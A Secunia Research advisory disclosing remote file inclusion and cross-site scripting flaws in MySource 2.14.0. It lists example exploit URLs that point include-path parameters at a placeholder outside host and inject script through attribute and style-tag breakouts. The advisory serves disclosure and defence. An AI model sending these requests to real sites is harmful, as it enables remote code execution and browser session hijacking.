Secunia Research has discovered some vulnerabilities in MySource, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a vulnerable system.

1) Some input isn't properly verified, before it used to include files. This can be exploited to include arbitrary files from external and local resources.

Examples:
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?

Successful exploitation requires that "register_globals" is enabled and that the affected scripts are placed accessible inside the web root.

2) Some input isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Examples:
http://[victim]/web/edit/upgrade_in_progress_backend.php?target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/header.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code]

Successful exploitation requires that "register_globals" is enabled and that the affected scripts are placed accessible inside the web root.

The vulnerabilities have been confirmed in version 2.14.0. Prior versions may also be affected.

Solution
The vendor has fixed the vulnerabilities in version 2.14.2 by warning the user during the installation process about the security risks of placing MySource script files in a publicly available folder and having "register_globals" enabled.
Further details available to Secunia VIM customers

Provided and/or discovered by
Secunia Research

Original Advisory
Secunia Research:
http://secunia.com/secunia_research/2005-51/advisory/

Deep Links
Links available to Secunia VIM customers